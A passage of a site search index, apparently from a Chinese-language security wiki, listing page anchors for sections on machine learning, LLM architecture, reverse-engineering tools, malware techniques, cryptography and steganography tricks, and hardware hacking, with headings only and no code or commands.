","AI/AI-Risk-Frameworks.html#google-saif-风险","AI/AI-Risk-Frameworks.html#mitre-ai-atlas-matrix","AI/AI-Risk-Frameworks.html#llmjacking-token-theft--resale-of-cloud-hosted-llm-access","AI/AI-Risk-Frameworks.html#references","AI/AI-Supervised-Learning-Algorithms.html#监督学习算法","AI/AI-Supervised-Learning-Algorithms.html#基本信息","AI/AI-Supervised-Learning-Algorithms.html#算法","AI/AI-Supervised-Learning-Algorithms.html#线性回归","AI/AI-Supervised-Learning-Algorithms.html#逻辑回归","AI/AI-Supervised-Learning-Algorithms.html#决策树","AI/AI-Supervised-Learning-Algorithms.html#随机森林","AI/AI-Supervised-Learning-Algorithms.html#支持向量机svm","AI/AI-Supervised-Learning-Algorithms.html#朴素贝叶斯","AI/AI-Supervised-Learning-Algorithms.html#k
-最近邻-k-nn","AI/AI-Supervised-Learning-Algorithms.html#梯度提升机例如xgboost","AI/AI-Supervised-Learning-Algorithms.html#组合模型集成学习和堆叠","AI/AI-Supervised-Learning-Algorithms.html#参考文献","AI/AI-Unsupervised-Learning-Algorithms.html#无监督学习算法","AI/AI-Unsupervised-Learning-Algorithms.html#无监督学习","AI/AI-Unsupervised-Learning-Algorithms.html#k均值聚类","AI/AI-Unsupervised-Learning-Algorithms.html#层次聚类","AI/AI-Unsupervised-Learning-Algorithms.html#dbscan基于密度的噪声应用空间聚类","AI/AI-Unsupervised-Learning-Algorithms.html#主成分分析-pca","AI/AI-Unsupervised-Learning-Algorithms.html#高斯混合模型-gmm","AI/AI-Unsupervised-Learning-Algorithms.html#隔离森林","AI/AI-Unsupervised-Learning-Algorithms.html#t-sne-t-分布随机邻居嵌入","AI/AI-Unsupervised-Learning-Algorithms.html#hdbscan带噪声的层次密度聚类应用","AI/AI-Unsupervised-Learning-Algorithms.html#鲁棒性和安全性考虑--中毒与对抗攻击-2023-2025","AI/AI-Unsupervised-Learning-Algorithms.html#现代开源工具-2024-2025","AI/AI-Unsupervised-Learning-Algorithms.html#参考文献","AI/AI-Reinforcement-Learning-Algorithms.html#强化学习算法","AI/AI-Reinforcement-Learning-Algorithms.html#强化学习","AI/AI-Reinforcement-Learning-Algorithms.html#q-learning","AI/AI-Reinforcement-Learning-Algorithms.html#sarsa状态-动作-奖励-状态-动作","AI/AI-Reinforcement-Learning-Algorithms.html#on-policy-vs-off-policy-learning","AI/AI-llm-architecture/index.html#llm-训练---数据准备","AI/AI-llm-architecture/index.html#基本信息","AI/AI-llm-architecture/index.html#1-分词","AI/AI-llm-architecture/index.html#2-数据采样","AI/AI-llm-architecture/index.html#3-标记嵌入","AI/AI-llm-architecture/index.html#4-注意机制","AI/AI-llm-architecture/index.html#5-llm-架构","AI/AI-llm-architecture/index.html#6-预训练与加载模型","AI/AI-llm-architecture/index.html#70-lora-在微调中的改进","AI/AI-llm-architecture/index.html#71-分类的微调","AI/AI-llm-architecture/index.html#72-按照指令进行微调","AI/AI-llm-architecture/0.-basic-llm-concepts.html#0-基本-llm-概念","AI/AI-llm-architecture/0.-basic-llm-concepts.html#预训练","AI/AI-llm-architecture/0.-basic-llm-concepts.html#主要-llm-组件","AI/AI-llm-architecture/0.-basic-llm-concepts.html#tensors-in-pytorch","AI/AI
-llm-architecture/0.-basic-llm-concepts.html#mathematical-concept-of-tensors","AI/AI-llm-architecture/0.-basic-llm-concepts.html#tensors-as-data-containers","AI/AI-llm-architecture/0.-basic-llm-concepts.html#pytorch-tensors-vs-numpy-arrays","AI/AI-llm-architecture/0.-basic-llm-concepts.html#creating-tensors-in-pytorch","AI/AI-llm-architecture/0.-basic-llm-concepts.html#tensor-数据类型","AI/AI-llm-architecture/0.-basic-llm-concepts.html#常见的张量操作","AI/AI-llm-architecture/0.-basic-llm-concepts.html#在深度学习中的重要性","AI/AI-llm-architecture/0.-basic-llm-concepts.html#自动微分","AI/AI-llm-architecture/0.-basic-llm-concepts.html#自动微分的数学解释","AI/AI-llm-architecture/0.-basic-llm-concepts.html#在-pytorch-中实现自动微分","AI/AI-llm-architecture/0.-basic-llm-concepts.html#在更大神经网络中的反向传播","AI/AI-llm-architecture/0.-basic-llm-concepts.html#1-扩展到多层网络","AI/AI-llm-architecture/0.-basic-llm-concepts.html#2-反向传播算法","AI/AI-llm-architecture/0.-basic-llm-concepts.html#3-数学表示","AI/AI-llm-architecture/0.-basic-llm-concepts.html#4-pytorch-实现","AI/AI-llm-architecture/0.-basic-llm-concepts.html#5-理解反向传播","AI/AI-llm-architecture/0.-basic-llm-concepts.html#6-自动微分的优点","AI/AI-llm-architecture/1.-tokenizing.html#1-tokenizing","AI/AI-llm-architecture/1.-tokenizing.html#tokenizing","AI/AI-llm-architecture/1.-tokenizing.html#how-tokenizing-works","AI/AI-llm-architecture/1.-tokenizing.html#advanced-tokenizing-methods","AI/AI-llm-architecture/1.-tokenizing.html#code-example","AI/AI-llm-architecture/1.-tokenizing.html#参考","AI/AI-llm-architecture/2.-data-sampling.html#2-数据采样","AI/AI-llm-architecture/2.-data-sampling.html#数据采样","AI/AI-llm-architecture/2.-data-sampling.html#为什么数据采样很重要","AI/AI-llm-architecture/2.-data-sampling.html#数据采样中的关键概念","AI/AI-llm-architecture/2.-data-sampling.html#逐步示例","AI/AI-llm-architecture/2.-data-sampling.html#代码示例","AI/AI-llm-architecture/2.-data-sampling.html#高级采样策略-2023-2025","AI/AI-llm-architecture/2.-data-sampling.html#1-基于温度的混合加权","AI/AI-llm-architecture/3.-token-embeddings.html#3-token-embeddin
gs","AI/AI-llm-architecture/3.-token-embeddings.html#token-embeddings","AI/AI-llm-architecture/3.-token-embeddings.html#what-are-token-embeddings","AI/AI-llm-architecture/3.-token-embeddings.html#initializing-token-embeddings","AI/AI-llm-architecture/3.-token-embeddings.html#标记嵌入在训练中的工作原理","AI/AI-llm-architecture/3.-token-embeddings.html#位置嵌入为令牌嵌入添加上下文","AI/AI-llm-architecture/3.-token-embeddings.html#为什么需要位置嵌入","AI/AI-llm-architecture/3.-token-embeddings.html#位置嵌入的类型","AI/AI-llm-architecture/3.-token-embeddings.html#位置嵌入是如何集成的","AI/AI-llm-architecture/3.-token-embeddings.html#代码示例","AI/AI-llm-architecture/3.-token-embeddings.html#参考文献","AI/AI-llm-architecture/4.-attention-mechanisms.html#4-注意机制","AI/AI-llm-architecture/4.-attention-mechanisms.html#神经网络中的注意机制和自注意力","AI/AI-llm-architecture/4.-attention-mechanisms.html#理解注意机制","AI/AI-llm-architecture/4.-attention-mechanisms.html#自注意力介绍","AI/AI-llm-architecture/4.-attention-mechanisms.html#计算注意权重逐步示例","AI/AI-llm-architecture/4.-attention-mechanisms.html#过程总结","AI/AI-llm-architecture/4.-attention-mechanisms.html#带可训练权重的自注意力","AI/AI-llm-architecture/4.-attention-mechanisms.html#代码示例","AI/AI-llm-architecture/4.-attention-mechanisms.html#因果注意力隐藏未来词汇","AI/AI-llm-architecture/4.-attention-mechanisms.html#应用因果注意力掩码","AI/AI-llm-architecture/4.-attention-mechanisms.html#使用-dropout-掩蔽额外的注意力权重","AI/AI-llm-architecture/4.-attention-mechanisms.html#代码示例-1","AI/AI-llm-architecture/4.-attention-mechanisms.html#扩展单头注意力到多头注意力","AI/AI-llm-architecture/4.-attention-mechanisms.html#代码示例-2","AI/AI-llm-architecture/4.-attention-mechanisms.html#references","AI/AI-llm-architecture/5.-llm-architecture.html#5-llm-architecture","AI/AI-llm-architecture/5.-llm-architecture.html#llm-architecture","AI/AI-llm-architecture/5.-llm-architecture.html#代码表示","AI/AI-llm-architecture/5.-llm-architecture.html#gelu-激活函数","AI/AI-llm-architecture/5.-llm-architecture.html#前馈神经网络","AI/AI-llm-architecture/5.-llm-architecture.html#多头注意力机制","AI/AI-llm-architecture/5.
-llm-architecture.html#层--归一化","AI/AI-llm-architecture/5.-llm-architecture.html#transformer-块","AI/AI-llm-architecture/5.-llm-architecture.html#gptmodel","AI/AI-llm-architecture/5.-llm-architecture.html#训练的参数数量","AI/AI-llm-architecture/5.-llm-architecture.html#逐步计算","AI/AI-llm-architecture/5.-llm-architecture.html#生成文本","AI/AI-llm-architecture/5.-llm-architecture.html#参考","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#6-预训练与加载模型","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#文本生成","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#文本评估","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#预训练示例","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#文本--ids-转换的函数","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#生成文本函数","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#loss-functions","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#加载数据","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#sanity-checks","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#选择用于训练和预计算的设备","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#训练函数","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#start-training","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#打印训练演变","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#保存模型","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#加载-gpt2-权重","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#参考文献","AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.html#70-lora-在微调中的改进","AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.html#lora-改进","AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.html#参考","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#71-fine-tuning-for-classification","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#什么是","AI/AI-llm-architecture/7.1.-fine-tuning
-for-classification.html#准备数据集","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#数据集大小","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#条目长度","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#初始化模型","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#分类头","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#参数调整","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#entries-to-use-for-training","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#完整的gpt2微调分类代码","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#参考文献","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#72-微调以遵循指令","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#数据集","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#批处理和数据加载器","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#加载预训练llm--微调--损失检查","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#响应质量","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#跟随指令微调代码","AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.html#参考文献","reversing/reversing-tools-basic-methods/index.html#反向工程工具与基本方法","reversing/reversing-tools-basic-methods/index.html#基于-imgui-的反向工程工具","reversing/reversing-tools-basic-methods/index.html#wasm-反编译器--wat-编译器","reversing/reversing-tools-basic-methods/index.html#net-反编译器","reversing/reversing-tools-basic-methods/index.html#dotpeek","reversing/reversing-tools-basic-methods/index.html#net-reflector","reversing/reversing-tools-basic-methods/index.html#ilspy--和--dnspy","reversing/reversing-tools-basic-methods/index.html#dnspy-日志记录","reversing/reversing-tools-basic-methods/index.html#dnspy-调试","reversing/reversing-tools-basic-methods/index.html#java-decompiler","reversing/reversing-tools-basic-methods/index.html#debugging-dlls","reversing/reversing-tools-basic-methods/index.html#using-ida","reversing/reversing-t
ools-basic-methods/index.html#using-x64dbgx32dbg","reversing/reversing-tools-basic-methods/index.html#gui-apps--videogames","reversing/reversing-tools-basic-methods/index.html#arm--mips","reversing/reversing-tools-basic-methods/index.html#shellcodes","reversing/reversing-tools-basic-methods/index.html#debugging-a-shellcode-with-blobrunner","reversing/reversing-tools-basic-methods/index.html#debugging-a-shellcode-with-jmp2it","reversing/reversing-tools-basic-methods/index.html#debugging-shellcode-using-cutter","reversing/reversing-tools-basic-methods/index.html#deobfuscating-shellcode-and-getting-executed-functions","reversing/reversing-tools-basic-methods/index.html#使用-cyberchef-反汇编","reversing/reversing-tools-basic-methods/index.html#movfuscator","reversing/reversing-tools-basic-methods/index.html#rust","reversing/reversing-tools-basic-methods/index.html#delphi","reversing/reversing-tools-basic-methods/index.html#golang","reversing/reversing-tools-basic-methods/index.html#编译的-python","reversing/reversing-tools-basic-methods/index.html#gba---game-body-advance","reversing/reversing-tools-basic-methods/index.html#game-boy","reversing/reversing-tools-basic-methods/index.html#courses","reversing/reversing-tools-basic-methods/angr/index.html#安装","reversing/reversing-tools-basic-methods/angr/index.html#基本操作","reversing/reversing-tools-basic-methods/angr/index.html#加载和主对象信息","reversing/reversing-tools-basic-methods/angr/index.html#加载的数据","reversing/reversing-tools-basic-methods/angr/index.html#主要目标","reversing/reversing-tools-basic-methods/angr/index.html#符号和重定位","reversing/reversing-tools-basic-methods/angr/index.html#块","reversing/reversing-tools-basic-methods/angr/index.html#动态分析","reversing/reversing-tools-basic-methods/angr/index.html#模拟管理器状态","reversing/reversing-tools-basic-methods/angr/index.html#调用函数","reversing/reversing-tools-basic-methods/angr/index.html#位向量","reversing/reversing-tools-basic-methods/angr/index.html#符号位向量与约束","reversing/reversing-tools-basic-met
hods/angr/index.html#钩子","reversing/reversing-tools-basic-methods/angr/index.html#示例","reversing/reversing-tools-basic-methods/angr/angr-examples.html#angr---示例","reversing/reversing-tools-basic-methods/angr/angr-examples.html#输入以到达地址指示地址","reversing/reversing-tools-basic-methods/angr/angr-examples.html#输入以到达地址指示打印","reversing/reversing-tools-basic-methods/angr/angr-examples.html#注册表值","reversing/reversing-tools-basic-methods/angr/angr-examples.html#堆栈值","reversing/reversing-tools-basic-methods/angr/angr-examples.html#静态内存值全局变量","reversing/reversing-tools-basic-methods/angr/angr-examples.html#动态内存值-malloc","reversing/reversing-tools-basic-methods/angr/angr-examples.html#文件模拟","reversing/reversing-tools-basic-methods/angr/angr-examples.html#应用约束","reversing/reversing-tools-basic-methods/angr/angr-examples.html#simulation-managers","reversing/reversing-tools-basic-methods/angr/angr-examples.html#钩子绕过对一个函数的调用","reversing/reversing-tools-basic-methods/angr/angr-examples.html#钩住一个函数--simprocedure","reversing/reversing-tools-basic-methods/angr/angr-examples.html#使用多个参数模拟-scanf","reversing/reversing-tools-basic-methods/angr/angr-examples.html#静态二进制文件","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#基本操作","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#布尔值与或非","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#整数简化实数","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#打印模型","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#机器算术","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#有符号无符号数字","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#函数","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#示例","reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.html#数独求解器","reversing/reversing-t
ools-basic-methods/satisfiability-modulo-theories-smt-z3.html#参考文献","reversing/reversing-tools-basic-methods/cheat-engine.html#cheat-engine","reversing/reversing-tools-basic-methods/cheat-engine.html#你在搜索什么","reversing/reversing-tools-basic-methods/cheat-engine.html#热键","reversing/reversing-tools-basic-methods/cheat-engine.html#修改值","reversing/reversing-tools-basic-methods/cheat-engine.html#搜索值","reversing/reversing-tools-basic-methods/cheat-engine.html#通过已知的变化","reversing/reversing-tools-basic-methods/cheat-engine.html#未知值已知变化","reversing/reversing-tools-basic-methods/cheat-engine.html#随机内存地址---查找代码","reversing/reversing-tools-basic-methods/cheat-engine.html#随机内存地址---查找指针","reversing/reversing-tools-basic-methods/cheat-engine.html#代码注入","reversing/reversing-tools-basic-methods/cheat-engine.html#cheat-engine-7x-的高级功能2023-2025","reversing/reversing-tools-basic-methods/cheat-engine.html#指针扫描器-2-改进","reversing/reversing-tools-basic-methods/cheat-engine.html#ultimap-3--intel-pt-跟踪","reversing/reversing-tools-basic-methods/cheat-engine.html#1字节-jmp--自动补丁模板","reversing/reversing-tools-basic-methods/cheat-engine.html#使用-dbvmamd-和-intel进行内核级隐身","reversing/reversing-tools-basic-methods/cheat-engine.html#使用--ceserver--进行远程跨平台调试","reversing/reversing-tools-basic-methods/cheat-engine.html#其他值得注意的工具","reversing/reversing-tools-basic-methods/cheat-engine.html#安装与-opsec-注意事项-2024-2025","reversing/reversing-tools-basic-methods/cheat-engine.html#参考文献","reversing/reversing-tools-basic-methods/blobrunner.html","reversing/common-api-used-in-malware.html#常见-api-在-malware-中使用","reversing/common-api-used-in-malware.html#通用","reversing/common-api-used-in-malware.html#网络","reversing/common-api-used-in-malware.html#tls-pinning-and-chunked-transport","reversing/common-api-used-in-malware.html#持久化","reversing/common-api-used-in-malware.html#加密","reversing/common-api-used-in-malware.html#反分析vm","reversing/common-api-used-in-malware.html#emulator-api-fingerprinting--sleep-evasion","reversing/com
mon-api-used-in-malware.html#stealth","reversing/common-api-used-in-malware.html#execution","reversing/common-api-used-in-malware.html#miscellaneous","reversing/common-api-used-in-malware.html#malware-techniques","reversing/common-api-used-in-malware.html#dll-injection","reversing/common-api-used-in-malware.html#reflective-dll-injection","reversing/common-api-used-in-malware.html#thread-hijacking","reversing/common-api-used-in-malware.html#pe-injection","reversing/common-api-used-in-malware.html#process-hollowing-aka--runpe-","reversing/common-api-used-in-malware.html#hooking","reversing/common-api-used-in-malware.html#references","reversing/word-macros.html#word-macros","reversing/word-macros.html#垃圾代码","reversing/word-macros.html#宏表单","crypto-and-stego/cryptographic-algorithms/index.html#加密压缩算法","crypto-and-stego/cryptographic-algorithms/index.html#识别算法","crypto-and-stego/cryptographic-algorithms/index.html#api-函数","crypto-and-stego/cryptographic-algorithms/index.html#代码常量","crypto-and-stego/cryptographic-algorithms/index.html#数据信息","crypto-and-stego/cryptographic-algorithms/index.html#rc4--对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点","crypto-and-stego/cryptographic-algorithms/index.html#初始化阶段替代盒-注意数字256作为计数器的使用以及在256个字符的每个位置写入0的方式","crypto-and-stego/cryptographic-algorithms/index.html#打乱阶段","crypto-and-stego/cryptographic-algorithms/index.html#异或阶段","crypto-and-stego/cryptographic-algorithms/index.html#aes-对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点-1","crypto-and-stego/cryptographic-algorithms/index.html#sbox-常量","crypto-and-stego/cryptographic-algorithms/index.html#serpent--对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点-2","crypto-and-stego/cryptographic-algorithms/index.html#识别","crypto-and-stego/cryptographic-algorithms/index.html#rsa--非对称加密","crypto-and-stego/cryptographic-algorithms/index.html#特点-3","crypto-and-stego/cryptographic-algorithms/index.html#通过比较识别","crypto-and-stego/cryptographic-algorithms/i
ndex.html#md5--sha哈希","crypto-and-stego/cryptographic-algorithms/index.html#特点-4","crypto-and-stego/cryptographic-algorithms/index.html#识别-1","crypto-and-stego/cryptographic-algorithms/index.html#crc哈希","crypto-and-stego/cryptographic-algorithms/index.html#识别-2","crypto-and-stego/cryptographic-algorithms/index.html#aplib压缩","crypto-and-stego/cryptographic-algorithms/index.html#特点-5","crypto-and-stego/cryptographic-algorithms/index.html#识别-3","crypto-and-stego/cryptographic-algorithms/unpacking-binaries.html#识别打包的二进制文件","crypto-and-stego/cryptographic-algorithms/unpacking-binaries.html#基本建议","crypto-and-stego/certificates.html#证书","crypto-and-stego/certificates.html#什么是证书","crypto-and-stego/certificates.html#x509-常见字段","crypto-and-stego/certificates.html#x509-证书中的常见字段","crypto-and-stego/certificates.html#ocsp与crl分发点的区别","crypto-and-stego/certificates.html#什么是证书透明性","crypto-and-stego/certificates.html#格式","crypto-and-stego/certificates.html#pem格式","crypto-and-stego/certificates.html#der格式","crypto-and-stego/certificates.html#p7bpkcs7格式","crypto-and-stego/certificates.html#pfxp12pkcs12格式","crypto-and-stego/certificates.html#格式转换","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#cbc","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#cbc-mac","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#vulnerability","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#summary","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#attack-controlling-iv","crypto-and-stego/cipher-block-chaining-cbc-mac-priv.html#references","crypto-and-stego/crypto-ctfs-tricks.html#crypto-ctfs-tricks","crypto-and-stego/crypto-ctfs-tricks.html#在线哈希数据库","crypto-and-stego/crypto-ctfs-tricks.html#魔法自动解码器","crypto-and-stego/crypto-ctfs-tricks.html#编码器","crypto-and-stego/crypto-ctfs-tricks.html#替换自动解码器","crypto-and-stego/crypto-ctfs-tricks.html#基础编码自动解码器","crypto-and-stego/crypto-ctfs-tricks.html#hackerizexs--Λ-","crypto-and-stego/crypto-ctfs-tricks.html#摩尔斯","crypto-and-s
tego/crypto-ctfs-tricks.html#uuencoder","crypto-and-stego/crypto-ctfs-tricks.html#xxencoder","crypto-and-stego/crypto-ctfs-tricks.html#yencoder","crypto-and-stego/crypto-ctfs-tricks.html#binhex","crypto-and-stego/crypto-ctfs-tricks.html#ascii85","crypto-and-stego/crypto-ctfs-tricks.html#dvorak-键盘","crypto-and-stego/crypto-ctfs-tricks.html#a1z26","crypto-and-stego/crypto-ctfs-tricks.html#仿射密码编码","crypto-and-stego/crypto-ctfs-tricks.html#sms-code","crypto-and-stego/crypto-ctfs-tricks.html#bacon-code","crypto-and-stego/crypto-ctfs-tricks.html#runes","crypto-and-stego/crypto-ctfs-tricks.html#压缩","crypto-and-stego/crypto-ctfs-tricks.html#简易加密","crypto-and-stego/crypto-ctfs-tricks.html#xor---自动解密器","crypto-and-stego/crypto-ctfs-tricks.html#bifid","crypto-and-stego/crypto-ctfs-tricks.html#vigenere","crypto-and-stego/crypto-ctfs-tricks.html#强加密","crypto-and-stego/crypto-ctfs-tricks.html#fernet","crypto-and-stego/crypto-ctfs-tricks.html#samir-秘密共享","crypto-and-stego/crypto-ctfs-tricks.html#openssl-暴力破解","crypto-and-stego/crypto-ctfs-tricks.html#工具","crypto-and-stego/electronic-code-book-ecb.html#ecb","crypto-and-stego/electronic-code-book-ecb.html#漏洞检测","crypto-and-stego/electronic-code-book-ecb.html#漏洞利用","crypto-and-stego/electronic-code-book-ecb.html#移除整个块","crypto-and-stego/electronic-code-book-ecb.html#移动块","crypto-and-stego/electronic-code-book-ecb.html#参考","crypto-and-stego/hash-length-extension-attack.html#hash-length-extension-attack","crypto-and-stego/hash-length-extension-attack.html#攻击总结","crypto-and-stego/hash-length-extension-attack.html#如何","crypto-and-stego/hash-length-extension-attack.html#工具","crypto-and-stego/hash-length-extension-attack.html#参考文献","crypto-and-stego/padding-oracle-priv.html#padding-oracle","crypto-and-stego/padding-oracle-priv.html#cbc---密码块链接","crypto-and-stego/padding-oracle-priv.html#消息填充","crypto-and-stego/padding-oracle-priv.html#填充-oracle","crypto-and-stego/padding-oracle-priv.html#如何利用","crypto-and-stego/padding-oracle-priv.html#理论"
,"crypto-and-stego/padding-oracle-priv.html#漏洞检测","crypto-and-stego/padding-oracle-priv.html#参考","crypto-and-stego/rc4-encrypt-and-decrypt.html#rc4-加密和解密","crypto-and-stego/stego-tricks.html#stego-tricks","crypto-and-stego/stego-tricks.html#从文件中提取数据","crypto-and-stego/stego-tricks.html#binwalk","crypto-and-stego/stego-tricks.html#foremost","crypto-and-stego/stego-tricks.html#exiftool","crypto-and-stego/stego-tricks.html#exiv2","crypto-and-stego/stego-tricks.html#文件","crypto-and-stego/stego-tricks.html#字符串","crypto-and-stego/stego-tricks.html#比较-cmp","crypto-and-stego/stego-tricks.html#提取文本中的隐藏数据","crypto-and-stego/stego-tricks.html#空格中的隐藏数据","crypto-and-stego/stego-tricks.html#从图像中提取数据","crypto-and-stego/stego-tricks.html#使用-graphicmagick-识别图像细节","crypto-and-stego/stego-tricks.html#steghide用于数据隐藏","crypto-and-stego/stego-tricks.html#zsteg用于png和bmp文件","crypto-and-stego/stego-tricks.html#stegoveritas和stegsolve","crypto-and-stego/stego-tricks.html#fft用于隐藏内容检测","crypto-and-stego/stego-tricks.html#stegpy用于音频和图像文件","crypto-and-stego/stego-tricks.html#pngcheck用于png文件分析","crypto-and-stego/stego-tricks.html#图像分析的附加工具","crypto-and-stego/stego-tricks.html#从音频中提取数据","crypto-and-stego/stego-tricks.html#steghide-jpeg-bmp-wav-au","crypto-and-stego/stego-tricks.html#stegpy-png-bmp-gif-webp-wav","crypto-and-stego/stego-tricks.html#ffmpeg","crypto-and-stego/stego-tricks.html#wavsteg-wav","crypto-and-stego/stego-tricks.html#deepsound","crypto-and-stego/stego-tricks.html#sonic-visualizer","crypto-and-stego/stego-tricks.html#dtmf-tones---dial-tones","crypto-and-stego/stego-tricks.html#other-techniques","crypto-and-stego/stego-tricks.html#binary-length-sqrt---qr-code","crypto-and-stego/stego-tricks.html#盲文翻译","crypto-and-stego/stego-tricks.html#参考文献","crypto-and-stego/esoteric-languages.html#esoteric-languages","crypto-and-stego/esoteric-languages.html#esolangs-wiki","crypto-and-stego/esoteric-languages.html#malbolge","crypto-and-stego/esoteric-languages.html#npiet","crypto-and-stego/eso
teric-languages.html#rockstar","crypto-and-stego/esoteric-languages.html#petooh","crypto-and-stego/blockchain-and-crypto-currencies.html#基本概念","crypto-and-stego/blockchain-and-crypto-currencies.html#共识机制","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币基础知识","crypto-and-stego/blockchain-and-crypto-currencies.html#交易","crypto-and-stego/blockchain-and-crypto-currencies.html#闪电网络","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币隐私问题","crypto-and-stego/blockchain-and-crypto-currencies.html#匿名获取比特币","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币隐私攻击","crypto-and-stego/blockchain-and-crypto-currencies.html#比特币隐私攻击总结","crypto-and-stego/blockchain-and-crypto-currencies.html#共同输入所有权假设","crypto-and-stego/blockchain-and-crypto-currencies.html#utxo找零地址检测","crypto-and-stego/blockchain-and-crypto-currencies.html#示例","crypto-and-stego/blockchain-and-crypto-currencies.html#社交网络与论坛曝光","crypto-and-stego/blockchain-and-crypto-currencies.html#交易图分析","crypto-and-stego/blockchain-and-crypto-currencies.html#不必要输入启发式最佳找零启发式","crypto-and-stego/blockchain-and-crypto-currencies.html#示例-1","crypto-and-stego/blockchain-and-crypto-currencies.html#强制地址重用","crypto-and-stego/blockchain-and-crypto-currencies.html#正确的钱包行为","crypto-and-stego/blockchain-and-crypto-currencies.html#其他区块链分析技术","crypto-and-stego/blockchain-and-crypto-currencies.html#流量分析","crypto-and-stego/blockchain-and-crypto-currencies.html#更多","crypto-and-stego/blockchain-and-crypto-currencies.html#匿名比特币交易","crypto-and-stego/blockchain-and-crypto-currencies.html#匿名获取比特币的方法","crypto-and-stego/blockchain-and-crypto-currencies.html#混合服务","crypto-and-stego/blockchain-and-crypto-currencies.html#coinjoin","crypto-and-stego/blockchain-and-crypto-currencies.html#payjoin","crypto-and-stego/blockchain-and-crypto-currencies.html#加密货币隐私的最佳实践","crypto-and-stego/blockchain-and-crypto-currencies.html#钱包同步技术","crypto-and-stego/blockchain-and-crypto-currencies.html#利用-tor-实现匿名性","crypto-and-stego/blockchain-and-crypto
-currencies.html#防止地址重用","crypto-and-stego/blockchain-and-crypto-currencies.html#交易隐私策略","crypto-and-stego/blockchain-and-crypto-currencies.html#门罗币匿名性的灯塔","crypto-and-stego/blockchain-and-crypto-currencies.html#以太坊燃料费和交易","crypto-and-stego/blockchain-and-crypto-currencies.html#理解燃料费","crypto-and-stego/blockchain-and-crypto-currencies.html#执行交易","crypto-and-stego/blockchain-and-crypto-currencies.html#参考文献","todo/interesting-http.html#引荐头和策略","todo/interesting-http.html#敏感信息泄露","todo/interesting-http.html#缓解措施","todo/interesting-http.html#counter-mitigation","todo/interesting-http.html#防御","todo/rust-basics.html#rust-basics","todo/rust-basics.html#泛型","todo/rust-basics.html#option-some--none","todo/rust-basics.html#宏","todo/rust-basics.html#迭代","todo/rust-basics.html#递归盒子","todo/rust-basics.html#条件语句","todo/rust-basics.html#特性","todo/rust-basics.html#测试","todo/rust-basics.html#线程","todo/rust-basics.html#安全基础","todo/rust-basics.html#参考","todo/more-tools.html#blueteam","todo/more-tools.html#osint","todo/more-tools.html#web","todo/more-tools.html#windows","todo/more-tools.html#firmware","todo/more-tools.html#other","todo/hardware-hacking/index.html#硬件黑客","todo/hardware-hacking/index.html#jtag","todo/hardware-hacking/index.html#测试接入端口","todo/hardware-hacking/index.html#识别-jtag-引脚","todo/hardware-hacking/index.html#sdw","todo/hardware-hacking/fault_injection_attacks.html#fault-injection-attacks","todo/hardware-hacking/i2c.html#i2c","todo/hardware-hacking/i2c.html#bus-pirate","todo/hardware-hacking/i2c.html#sniffer","todo/hardware-hacking/side_channel_analysis.html#侧信道分析攻击","todo/hardware-hacking/side_channel_analysis.html#主要泄漏通道","todo/hardware-hacking/side_channel_analysis.html#电力分析","todo/hardware-hacking/side_channel_analysis.html#简单电力分析spa","todo/hardware-hacking/side_channel_analysis.html#differentialcorrelation-power-analysis-dpacpa","todo/hardware-hacking/side_channel_analysis.html#电磁分析-ema","todo/hardware-hacking/side_channel_analysis.h